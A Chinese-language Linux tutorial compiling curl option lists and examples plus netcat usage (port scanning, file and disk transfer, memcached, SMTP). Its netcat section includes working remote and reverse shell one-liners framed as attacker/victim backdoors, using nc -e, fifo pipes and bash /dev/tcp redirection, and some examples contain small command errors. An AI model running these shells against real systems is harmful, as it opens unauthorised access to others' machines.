linux学习:curl与netcat用法整理
CURL
语法: curl [option] [url]
常用参数:
-A/--user-agent <string> 设置用户代理发送给服务器
-b/--cookie <name=string/file> cookie字符串或文件读取位置
-c/--cookie-jar <file> 操作结束后把cookie写入到这个文件中
-C/--continue-at <offset> 断点续转
-D/--dump-header <file> 把header信息写入到该文件中
-e/--referer 来源网址
-f/--fail 连接失败时不显示http错误
-o/--output 把输出写到该文件中
-O/--remote-name 把输出写到该文件中,保留远程文件的文件名
-r/--range <range> 检索来自HTTP/1.1或FTP服务器字节范围
-s/--silent 静音模式。不输出任何东西
-T/--upload-file <file> 上传文件
-u/--user <user[:password]> 设置服务器的用户和密码
-w/--write-out [format] 什么输出完成后
-x/--proxy <host[:port]> 在给定的端口上使用HTTP代理
-#/--progress-bar 进度条显示当前的传送状态
例子:
1.1、访问网址,打印响应的内容(html代码)
curl http://www.test.com
1.2、参数-f显示抓取错误,
curl -f http://www.test.com/error
1.3、保存访问的文件
curl http://www.test.com >> test.html
1.4、可以使用curl的内置option:-o(小写)保存网页
curl -o test.html http://www.test.
1.5、参数-O(大写)保存网页中的文件,注意url要具体到某个文件,不然抓不下来,比如http://www.test.com/page/2/ 是无法抓取的
curl -O http://www.test.com/hello.xml
1.6、测试网页返回值,在脚本中,这是很常见的测试网站是否正常的用法,一般返回200
curl -o /dev/null -s -w %{http_code} www.test.com
1.7、指定proxy服务器以及其端口,参数 -x 用来支持设置代理
curl -x 192.168.100.100:1080 http://www.test.com
1.8、选项-u完成HTTP或FTP认证
curl -u username:password http://www.test.com
1.9、只使用username,后续运行提示输入密码
curl -u username http://www.test.com
2.1、参数 -o(小写)下载文件,下载到本地的文件需自己命名
curl -o img1.jpg http:www.test.com/img1.jpg
同时下载多个文件
curl -o img1.jpg http://www.test.com/img1.jpg -o img2.jpg http://www.test.com/img2.jpg
2.2、参数 -O(大写)以服务器上的名称保存文件到本地
curl -O http://www.test.com/img1.jpg
2.3、循环下载,下载部分文件。例如把img1,img2,img3下载下来
curl -O http://www.test.com/img[1-3].jpg
2.4、分别下载目标完整aa和bb目录下的img1、img2和img3图片,但第二次下载的会把第一次下载的覆盖。
curl -O http://www.test.com/{aa,bb}/dodo[1-3].jpg
2.5、这样在aa/img1.jpg的文件下载下来就会变成aa_img1.jpg,其他文件依此类推,从而避免了文件被覆盖
curl -o #1_#2.img http://www.test.com/{aa,bb}/img[1-3].jpg
2.6、分块下载,对于大文件,使用参数 -r 实现分段下载
curl -r 0-100 -o img_part1.jpg http://www.test.com/img.jpg
curl -r 100-200 -o img_part2.jpg http://www.test.com/img.jpg
curl -r 200- -o img_part3.jpg http://www.test.com/img.jpg
cat img_part* > img.jpg
这样就可以查看img.jpg的内容了
2.7、通过ftp下载文件,curl提供两种从ftp中下载的语法
curl -O -u 用户名:密码 ftp://www.test.com/img.jpg
curl -O ftp://用户名:密码@www.test.com/img.jpg
2.8、显示下载进度条
curl -# -O http://www.test.com/img.jpg
2.9、不会显示下载进度信息
curl -s -O http://www.test.com/img.jpg
2.10、断点续传,如果在下载dodo1.jpg的过程中突然掉线了,可以使用参数-C实现续传
curl -C -O http://www.test.com/img.jpg
2.11、#选项--limit-rate限制curl的下载速度
curl --limit-rate 20k http:/www.test.com/img.jpg
2.12、选项--max-filesize指定可下载的最大文件大小。若文件大小超出限制,命令返回一个非0的退出吗,若正常运行,则返回0
curl --max-filesize bytes http://www.test.com/img.jpg
2.13、上传文件,-T来实现向ftp服务器上传了文件test.jpg
curl -T test.jpg -u 用户名:密码 ftp://www.test.com/img/
3.1、可以使用 -I 选项显示 HTTP 头,而不显示文件内容
curl -I http://www.test.com
3.2、使用 -i 选项可以同时显示 HTTP 头和文件内容,
curl -i http://www.codebelief.com
3.3、参数 -L 跟随链接重定向,假如http://a.test.com是重定向到http://www.test.com,使用-L参数,让CURL像浏览器一样跟随连接的重定向,获取重定向后的页面的内容
curl http://a.test.com
3.4、 使用 -A 自定义 User-Agent
curl -A "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" http://www.test.com
3.5、使用 -H 自定义 header。当我们使用 -H 来自定义 User-Agent 时,需要使用 "User-Agent: xxx" 的格式。
curl -H "Referer: www.test.com" -H "User-Agent: Custom-User-Agent" http://www.baidu.com
同时也可以直接在 header 中传递 Cookie,格式与上面的例子一样:
curl -H "Cookie: JSESSIONID=GO322A5063D938589F9G9S9EF8F939K89B" http://www.test.com
3.6、伪造referer(盗链),参数 -e 可以设定referer头
curl -e "www.test.com" http://mail.test.com
4.1、使用 -d 发送 POST 请求,参数 -X 用于指定发送数据的方式:
curl -d "userName=tom&passwd=123456" -X POST http://www.test.com/login
在使用 -d 的情况下,如果省略 -X,则默认为 POST 方式:
curl -d "userName=tom&passwd=123456" http://www.test.com/login
4.2、从文件中读取数据发送post请求
curl -d "@data.txt" http://www.test.com/login
4.3、在使用 -d 的情况下,强制使用 GET 方式:
curl -d "somedata" -X GET http://www.test.com/api
或者使用 -G 选项:
curl -d "somedata" -G http://www.test.com/api
4.4、参数-c(小写)保存http的response里面的cookie信息。执行后cookie信息就被存到了cookiec.txt里面了
curl -c cookiec.txt http://www.test.com
4.5、参数-D保存http的response里面的header信息。执行后cookie信息就被存到了cookied.txt里面了,注意:-c(小写)产生的cookie和-D里面的cookie是不一样的。
curl -D cookied.txt http://www.test.com
4.6:使用cookie,参数-b 带上cookie信息访问网址
curl -b cookiec.txt http://www.test.com
curl -b "JSESSIONID=D0112A5063D938586B659EF8F939BE24" http://www.test.com
4.7、带 Cookie 登录
登录时保存cookie
curl -c "cookie-login" -d "username=test&passwd=123456" http://www.test.com/login
再次访问该网站时(访问登录后的页面),带上cookie访问:
curl -b "cookie-login" http://www.test.com/login
其他参数
-a/--append 上传文件时,附加到目标文件
--anyauth 可以使用“任何”身份验证方法
--basic 使用HTTP基本验证
-B/--use-ascii 使用ASCII文本传输
-d/--data <data> HTTP POST方式传送数据
--data-ascii <data> 以ascii的方式post数据
--data-binary <data> 以二进制的方式post数据
--negotiate 使用HTTP身份验证
--digest 使用数字身份验证
--disable-eprt 禁止使用EPRT或LPRT
--disable-epsv 禁止使用EPSV
--egd-file <file> 为随机数据(SSL)设置EGD socket路径
--tcp-nodelay 使用TCP_NODELAY选项
-E/--cert <cert[:passwd]> 客户端证书文件和密码 (SSL)
--cert-type <type> 证书文件类型 (DER/PEM/ENG) (SSL)
--key <key> 私钥文件名 (SSL)
--key-type <type> 私钥文件类型 (DER/PEM/ENG) (SSL)
--pass <pass> 私钥密码 (SSL)
--engine <eng> 加密引擎使用 (SSL). "--engine list" for list
--cacert <file> CA证书 (SSL)
--capath <directory> CA目 (made using c_rehash) to verify peer against (SSL)
--ciphers <list> SSL密码
--compressed 要求返回是压缩的形势 (using deflate or gzip)
--connect-timeout <seconds> 设置最大请求时间
--create-dirs 建立本地目录的目录层次结构
--crlf 上传是把LF转变成CRLF
--ftp-create-dirs 如果远程目录不存在,创建远程目录
--ftp-method [multicwd/nocwd/singlecwd] 控制CWD的使用
--ftp-pasv 使用 PASV/EPSV 代替端口
--ftp-skip-pasv-ip 使用PASV的时候,忽略该IP地址
--ftp-ssl 尝试用 SSL/TLS 来进行ftp数据传输
--ftp-ssl-reqd 要求用 SSL/TLS 来进行ftp数据传输
-F/--form <name=content> 模拟http表单提交数据
-form-string <name=string> 模拟http表单提交数据
-g/--globoff 禁用网址序列和范围使用{}和[]
-G/--get 以get的方式来发送数据
-h/--help 帮助
-H/--header <line> 自定义头信息传递给服务器
--ignore-content-length 忽略的HTTP头信息的长度
-i/--include 输出时包括protocol头信息
-I/--head 只显示文档信息
-j/--junk-session-cookies 读取文件时忽略session cookie
--interface <interface> 使用指定网络接口/地址
--krb4 <level> 使用指定安全级别的krb4
-k/--insecure 允许不使用证书到SSL站点
-K/--config 指定的配置文件读取
-l/--list-only 列出ftp目录下的文件名称
--limit-rate <rate> 设置传输速度
--local-port<NUM> 强制使用本地端口号
-m/--max-time <seconds> 设置最大传输时间
--max-redirs <num> 设置最大读取的目录数
--max-filesize <bytes> 设置最大下载的文件总量
-M/--manual 显示全手动
-n/--netrc 从netrc文件中读取用户名和密码
--netrc-optional 使用 .netrc 或者 URL来覆盖-n
--ntlm 使用 HTTP NTLM 身份验证
-N/--no-buffer 禁用缓冲输出
-p/--proxytunnel 使用HTTP代理
--proxy-anyauth 选择任一代理身份验证方法
--proxy-basic 在代理上使用基本身份验证
--proxy-digest 在代理上使用数字身份验证
--proxy-ntlm 在代理上使用ntlm身份验证
-P/--ftp-port <address> 使用端口地址,而不是使用PASV
-Q/--quote <cmd> 文件传输前,发送命令到服务器
--range-file 读取(SSL)的随机文件
-R/--remote-time 在本地生成文件时,保留远程文件时间
--retry <num> 传输出现问题时,重试的次数
--retry-delay <seconds> 传输出现问题时,设置重试间隔时间
--retry-max-time <seconds> 传输出现问题时,设置最大重试时间
-S/--show-error 显示错误
--socks4 <host[:port]> 用socks4代理给定主机和端口
--socks5 <host[:port]> 用socks5代理给定主机和端口
-t/--telnet-option <OPT=val> Telnet选项设置
--trace <file> 对指定文件进行debug
--trace-ascii <file> Like --跟踪但没有hex输出
--trace-time 跟踪/详细输出时,添加时间戳
--url <URL> Spet URL to work with
-U/--proxy-user <user[:password]> 设置代理用户名和密码
-V/--version 显示版本信息
-X/--request <command> 指定什么命令
-y/--speed-time 放弃限速所要的时间。默认为30
-Y/--speed-limit 停止传输速度的限制,速度时间'秒
-z/--time-cond 传送时间设置
-0/--http1.0 使用HTTP 1.0
-1/--tlsv1 使用TLSv1(SSL)
-2/--sslv2 使用SSLv2的(SSL)
-3/--sslv3 使用的SSLv3(SSL)
--3p-quote like -Q for the source URL for 3rd party transfer
--3p-url 使用url,进行第三方传送
--3p-user 使用用户名和密码,进行第三方传送
-4/--ipv4 使用IP4
-6/--ipv6 使用IP6
netcat
注意:ubuntu自带的nc是netcat-openbsd版,不带-c/-e参数。
ubuntu可通过命令来查看版本:readlink -f $(which nc)
/bin/nc.traditional
默认 GNU 基础版本,一般系统自带。/bin/nc.openbsd
openbsd 版本,强大很多。
ubuntu安装:apt-get install nc-openbsd 或者 apt-get install nc-traditional
windows安装exe文件下载地址:https://eternallybored.org/misc/netcat/
参数
想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l port [-options] [hostname] [port]
- -c shell commands shell模式
- -e filename 程序重定向 [危险!!]
- -b 允许广播
- -d 无命令行界面,使用后台模式
- -g gateway 设置源路由跳跃点, 不超过8
- -G num 设置源路由指示器,数值为4的倍数: 4, 8, 12, ...
- -h 获取帮助信息
- -i secs 设置时间间隔,以便传送信息及扫描通信端口: -i 3
- -k 设置在socket上的存活选项
- -l 监听入站信息
- -n 直接使用ip地址,而不通过域名服务器
- -o file 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存:-o /mydata/test.txt
- -p port 设置本地端口:-p 8080
- -r 指定源端口和目的端口都进行随机的选择
- -q secs 在标准输入且延迟后退出(翻译的不是很好,后面实例介绍)
- -s addr 设置本地主机送出数据包的IP地址
- -T tos 设置服务类型
- -t 以TELNET的形式应答入站请求
- -u 使用UDP协议模式
- -v 显示详细信息 [使用-vv获取更详细的信息]
- -w <secs> 连接超时设置,比如连接5秒超时: -w 5
- -z 使用输入/输出(I/O) 模式 [扫描通信端口时使用]
假设服务器A的IP:192.168.0.11
假设服务器B的IP:192.168.0.12
文章部分例子中使用的端口为 4403 ,实际使用根据使用者修改。
1.1、端口扫描
nc -z -v -n 192.168.0.11 21-25
可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.
z 参数告诉netcat使用0 IO,连接成功后立即关闭连接,不进行数据交换
v 参数指使用冗余选项(译者注:即详细输出)
n 参数告诉netcat 不要使用DNS反向查询IP地址的域名
1.2、连接开放端口21并且打印运行在这个端口上服务的banner信息。
nc -v 192.168.0.11 21
2、聊天服务,建立连接后两边机器输入的信息都能显示在另一台连接上的机器
服务器A(服务端)执行:nc -l 4403
服务器B(客户端)执行:nc 192.168.0.11 4403
3.1、文件传输(A传给B,相当于B从A下载文件)
服务器A(服务端)执行:nc -l 4403 < file.txt
服务器B(客户端)执行:nc -n 192.168.0.11 4403 > file.txt
3.2、传输server创建在B(客户端)上,A(服务端)接收文件(B传给A):
服务器A(服务端):nc -l 4403 > file.txt
服务器B(客户端):nc 192.168.0.11 4403 < file.txt
当需要将客户端子网中某台机器传输文件到外网上的某台服务器上时适用,相当于上传文件
3.3、目录传输(从A传输到B),归档-传输-下载-解压
服务器A(服务端):tar -cvf – dir_name | nc -l 4403
服务器B(客户端):nc -n 192.168.0.11 4403 | tar -xvf -
3.4、如果想要节省带宽传输压缩包,我们可以使用bzip2或者其他工具压缩。
服务器A(服务端):tar -cvf – dir_name| bzip2 -z | nc -l 4403
服务器B(客户端):nc -n 192.168.0.11 4403 | bzip2 -d |tar -xvf -
3.4、备份档案
服务器A(服务端):tar czf - work|nc -l -c -p 1234
服务器B(客户端):nc 192.168.0.1 1234 >a.tgz
3.5、 加密你通过网络发送的数据,使用mcrypt工具解密数据。以下两个命令会提示需要密码,确保两端使用相同的密码
服务器A(服务端):nc localhost 4403 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
服务器B(客户端):mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 4403
3.6、流视频
服务器A(服务端):cat video.avi | nc -l 4403
服务器B(客户端):nc 192.168.0.11 4403 | mplayer -vo x11 -cache 3000 -
4、克隆一个设备
克隆Linux PC很简单,假如你的系统在磁盘/dev/sda上
dd是一个从磁盘读取原始数据的工具,我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。
服务器A(服务端):dd if=/dev/sda | nc -l 4403
服务器B(客户端):nc -n 192.168.0.11 4403 | dd of=/dev/sda
5.1、创建远程shell,假设本地netcat支持 -c -e 参数(默认 netcat)
服务器A(服务端):nc -l 4403 -e /bin/bash -i
服务器B(客户端):nc 192.168.0.11 4403
假如netcat 不支持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell
服务器A(服务端):
$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 4403 > /tmp/tmp_fifo
这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到netcat 运行的端口4403上。至此,我们已经把netcat的输出重定向到fifo文件中。
说明:
从网络收到的输入写到fifo文件中
cat 命令读取fifo文件并且其内容发送给sh命令
sh命令进程受到输入并把它写回到netcat。
netcat 通过网络发送输出到client
至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。
服务器B(客户端):
$nc -n 192.168.0.11 4403
5.2、反向shell(后门)
1)反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为192.168.1.11,我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如1.2.3.4的shell,那么我会用反向外壳用于这一目的。
服务器A(服务端):nc -l 4403
服务器B(客户端):nc 192.168.0.11 4403 -e /bin/bash
2)受害者的机器(服务端) :
nc -l -p port -e cmd.exe // windows
nc -l -p port -e /bin/sh // unix,linux
nc -lp port -c cmd //windows
nc -lp port -c bash //linux
攻击者的机器(客户端):.
nc ip -p port // 连接受害者机器IP,然后得到一个shell。
3)不使用-e选项反弹shell
攻击方先执行(服务端):
nc -lnvp 4430
被攻击方再执行(客户端):(如果非root账户无法执行mknod,则使用mkfifo /tmp/backpipe也可以创建一个管道。)
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 192.168.0.11 4430 1>/tmp/backpipe
4)攻击者(服务端):
nc -vv -l -p
受害者(客户端):
nc -e cmd.exe 192.168.0.11 -p 4403
nc -e /bin/sh 192.168.0.11 -p 4403
5)攻击者(服务端):
nc -vv -l -p 4403
nc -vv -l -p 4404
受害者(客户端):
nc 192.168.0.11 4403 | cmd.exe | nc 192.168.0.11 4404
nc 192.168.0.11 4403 | /bin/sh | nc 192.168.0.11 4404
6)Bash反弹
攻击者(服务端,IP:192.168.0.11):
nc -lvvp 4403
受害者(客户端):
bash -c 'sh -i &>/dev/tcp/192.168.0.11/4403 0>&1'
或者
bash -i >& /dev/tcp/192.168.0.11/4403 0>&1
或者
a=`bash -i >& /dev/tcp/192.168.0.11/4403 0>&1`;curl -d ${a} http://192.168.0.11/4403
6.1、指定源端口通讯,假设防火墙过滤除25端口外其它所有端口,则需要使用-p选项指定源端口。客户端开启25端口用于通讯,否则将使用随机端口。
服务器A(服务端):nc -l 4403
服务器B(客户端):nc 192.168.0.11 4403 -p 25
6.2、多ip时指定源地址通讯,假设你的机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。我们可以在netcat中使用-s选项指定ip地址。该命令将绑定地址192.168.0.13。
服务器A(服务端):nc -u -l 4403 < file.txt
服务器B(客户端):nc -u 192.168.0.11 4403 -s 192.168.0.13 > file.txt
7、用nc命令操作memcached
存储数据:printf "setkey 0 10 6rnresultrn” |nc 192.168.0.11 11211
获取数据:printf “get keyrn” |nc 192.168.0.11 11211
删除数据:printf “delete keyrn” |nc 192.168.0.11 11211
查看状态:printf "statsrn” |nc 192.168.0.11 11211
模拟top命令查看状态:watch “echo stats” |nc 192.168.0.11 11211
清空缓存:printf “flush_allrn” |nc 192.168.0.11 11211
8.1、在测试邮件服务器是否正常时,手动使用 SMTP 协议发送邮件
$nc localhost 25 << EOF
HELO host.example.com
MAIL FROM: <user@host.example.com>
RCPT TO: <user2@host.example.com>
DATA
Body of email.
.
QUIT
EOF
8.2、模拟HTTP Headers,访问一个网站,输入后双回车获取响应内容
$nc www.215814.com 80
GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser
9、其他
建立从本地1234端口到www.test.com的80端口连接,5秒超时
nc -p 1234 -w 5 www.test.com 80
u为UDP连接
nc -u www.test.com 53
扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -z www.test.com 70-80
开启服务并监听本地主机TCP80端口(-p 可以省略):
nc -l -p 80
nc -l 80
监听本地主机TCP80端口并将访问信息记录下来
nc -l -p 80 >>/log/listen.log
使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
nc -L -p 80
打开本地的7626端口进行监听,并反馈连接信息。
nc -l -v -p 7626
使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:/log.txt'中,如果把‘>' 改为‘>>'即可以追加日志
nc -L -p 80 > c:/log.txt
连到192.168.0.11的TCP80端口
nc -nvv 192.168.0.11 80
连接到192.168.0.11的80端口,并在其管道中发送'/test.txt'的内容(攻击程序)
nc -nvv 192.168.0.11 80 < /test.txt
端口数据抓包.
nc -vv -w 2 -o test.txt xfocus.Net 80 21-15